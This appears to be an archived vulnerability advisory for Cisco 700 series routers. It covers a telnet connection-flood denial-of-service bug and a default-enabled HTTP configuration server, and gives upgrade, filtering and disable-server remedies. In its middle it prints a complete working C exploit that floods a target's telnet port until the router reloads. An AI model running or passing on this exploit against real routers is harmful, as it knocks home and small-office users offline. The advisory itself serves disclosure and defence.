COMMAND
cisco
SYSTEMS AFFECTED
All versions of IOS/700 on all Cisco 700 series routers are
vulnerable. The 700 series includes all models in the 760 and 770
series including the 762M, 766M, 772M, and the 776M. All
international models in this series are also vulnerable.
PROBLEM
The following vulnerabilities were primarily researched by Dan
Ingevaldson of the ISS X-Force and the individuals at Cisco
Systems.
The first vulnerability, which has been assigned Cisco bug ID
CSCdm03231, can be used to cause system reloads, and therefore
denial of service, using TCP connections to the routers' TELNET
ports.
The second vulnerability has not been assigned a bug ID. 7xx
routers running software versions 3.2(5) through 4.2(3) support a
simple HTTP server (ClickStart). This HTTP server is enabled by
default. Unless the server is explicitly disabled, it can be
used to make changes to the router configuration, and/or to gain
information about that configuration. This is intentional
behavior, but is mentioned in this notice because it appears that
customers have been caught unawares by it.
Only networks incorporating 7xx series small-office/home-office
routers are affected by these vulnerabilities. 7xx routers are
designed to provide network connectivity for small remote networks
using ISDN BRI lines. If your network includes 7xx series routers,
they are most likely to be found in the homes of network users, or
in remote offices with no more than a few employees. CSCdm03231
affects all Cisco 7xx routers, running any software version up to
and including release 4.2(3), whose administrators have not taken
specific steps to filter incoming TCP connections. Such filtering
is not enabled by default. Routers running release 4.3(1) or later
software are not affected by CSCdm03231. The HTTP server is
present in all software releases from 3.2(5) through 4.2(3),
inclusive. The server is enabled by default in all of these
software versions.
Impact of CSCdm03231
--------------------
CSCdm03231 permits a remote attacker to force a 7xx router to
reload, denying service to the router's home or small office
user. It may sometimes be possible to degrade performance
without actually inducing a router reload. The attack
consumes relatively little bandwidth compared to
flooding-based denial of service attacks. In all cases, the
router will recover after the attack stops; the attacker must
send traffic continuously to maintain denial of service.
However, if the router has reloaded, the end user may have to
take some installation-dependent action to cause the router to
redial the ISDN connection. This vulnerability does not give
attackers access to the router CLI, nor does it give them
any other way of controlling the router beyond inducing denial
of service. Sample exploit for this vulnerability:
/* Cisco 760 Series Connection Overflow
 *
 * Written by: Tiz.Telesup
 * Affected Systems: Routers Cisco 760 Series, I haven't tested anymore
 * Tested on: FreeBSD 4.0 and Linux RedHat 6.0
 */
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int net_connect (struct sockaddr_in *cs, char *server,
                 unsigned short int port, char *sourceip,
                 unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);

void
usage (void)
{
    printf ("usage: ./cisco host times\n");
    exit (EXIT_FAILURE);
}

int
main (int argc, char *argv[])
{
    char host[256];
    int port, times, count, sd = 0;
    struct sockaddr_in cs;

    printf ("Cisco 760 series Connection Overflow.\n");
    printf ("-------------------------------------\n");
    if (argc < 3)
        usage ();
    strncpy (host, argv[1], sizeof (host) - 1);
    host[sizeof (host) - 1] = '\0';
    times = atoi (argv[2]);
    if ((times < 1) || (times > 10000)) /* Maximum number of connections */
        usage ();
    port = 23; /* This might be changed to the telnet port of the router */
    printf ("Host: %s Times: %d\n", host, times);

    for (count = 0; count < times; count++) {
        printf ("Connecting... Connection number %d \n", count);
        fflush (stdout);
        sd = net_connect (&cs, host, port, NULL, 0, 30);
        if (sd < 1) {
            printf ("failed!\n");
            exit (EXIT_FAILURE);
        }
        net_write (sd, "AAAA\n\n");
    }
    exit (EXIT_SUCCESS);
}

/* Non-blocking connect with a timeout of `sec` seconds; returns the
 * connected descriptor or -1 on failure. */
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port,
             char *sourceip, unsigned short int sourceport, int sec)
{
    int n, error, flags;
    socklen_t len;
    int fd;
    struct timeval tv;
    fd_set rset, wset;

    /* first allocate a socket */
    cs->sin_family = AF_INET;
    cs->sin_port = htons (port);
    fd = socket (cs->sin_family, SOCK_STREAM, 0);
    if (fd == -1)
        return (-1);
    if (!(cs->sin_addr.s_addr = net_resolve (server))) {
        close (fd);
        return (-1);
    }

    /* switch to non-blocking so connect() returns immediately */
    flags = fcntl (fd, F_GETFL, 0);
    if (flags == -1) {
        close (fd);
        return (-1);
    }
    n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
    if (n == -1) {
        close (fd);
        return (-1);
    }

    error = 0;
    n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
    if (n < 0) {
        if (errno != EINPROGRESS) {
            close (fd);
            return (-1);
        }
    }
    if (n == 0)
        goto done;

    /* wait for the connection to complete or the timeout to expire */
    FD_ZERO (&rset);
    FD_ZERO (&wset);
    FD_SET (fd, &rset);
    FD_SET (fd, &wset);
    tv.tv_sec = sec;
    tv.tv_usec = 0;
    n = select (fd + 1, &rset, &wset, NULL, &tv);
    if (n == 0) {
        close (fd);
        errno = ETIMEDOUT;
        return (-1);
    }
    if (n == -1)
        return (-1);

    if (FD_ISSET (fd, &rset) || FD_ISSET (fd, &wset)) {
        if (FD_ISSET (fd, &rset) && FD_ISSET (fd, &wset)) {
            len = sizeof (error);
            if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                errno = ETIMEDOUT;
                return (-1);
            }
            if (error == 0) {
                goto done;
            } else {
                errno = error;
                return (-1);
            }
        }
    } else
        return (-1);

done:
    /* restore blocking mode */
    n = fcntl (fd, F_SETFL, flags);
    if (n == -1)
        return (-1);
    return (fd);
}

/* Resolve a dotted-quad or hostname to a network-order IPv4 address;
 * returns 0 on failure. */
unsigned long int
net_resolve (char *host)
{
    in_addr_t i;
    struct hostent *he;

    i = inet_addr (host);
    if (i == INADDR_NONE) {
        he = gethostbyname (host);
        if (he == NULL) {
            return (0);
        } else {
            memcpy (&i, he->h_addr, sizeof (i));
            return (i);
        }
    }
    return (i);
}

/* printf-style write to a socket */
void
net_write (int fd, const char *str, ...)
{
    char tmp[8192];
    va_list vl;
    int i;

    va_start (vl, str);
    memset (tmp, 0, sizeof (tmp));
    i = vsnprintf (tmp, sizeof (tmp), str, vl);
    va_end (vl);
    send (fd, tmp, i, 0);
    return;
}
Impact of the Presence of the HTTP Server
-----------------------------------------
If the HTTP server is enabled, it can be used to change the
router's configuration, or to retrieve information about that
configuration. No special tools are required.
A simple program is needed to effectively exploit CSCdm03231.
Although Cisco knows of no program available to the public
specifically for this purpose, writing such a program would
require very little effort, and only the most basic of skill.
Also, certain publicly-available programs intended for other
purposes could be used or adapted to exploit the vulnerability.
Cisco has had no reports of abuse of the HTTP server on the 7xx
series. However, the potential for abuse is discussed in the
product documentation, and must be considered to be known to
potential attackers.
SOLUTION
CSCdm03231 affects all software versions earlier than 4.3(1).
Customers with 76x or 77x routers should upgrade to release
4.3(1). Because of memory limitations, release 4.3 is not
supported on the 75x routers; customers with 75x routers should
use IP filtering as described in the "Workarounds" section. The
HTTP server is present in all software versions from 3.2(5)
through 4.2(3). It is not present in 3.2(4) or earlier releases,
nor is it present in 4.3. Customers with 76x or 77x routers should
upgrade to release 4.3(1), primarily because of the desirability
of installing the CSCdm03231 fix. The HTTP server may be disabled
in any software version; disabling the server is the recommended
course of action for customers with 75x routers. Cisco is
offering free software upgrades to remedy CSCdm03231 for all
vulnerable customers, regardless of contract status. Customers
with service contracts may upgrade to any software version,
although they may only install the feature sets they've already
purchased. Customers without contracts may upgrade to version
4.3(1).
Workaround for CSCdm03231
-------------------------
CSCdm03231 can be made much less useful to attackers by preventing
incoming TCP connections to the router from untrusted hosts. This
can be done with the set ip filter profile command, as in the
following example:
set ip filter tcp source = not trusted-host destination = router block
This example would configure the router to accept incoming TCP
connections only from a single trusted administrative host. More
elaborate configurations, permitting connections of various types
from various hosts, are possible; see the router documentation for
more information.
Disabling the HTTP Server
-------------------------
The HTTP server may be disabled with the system command
Router> set clickstart off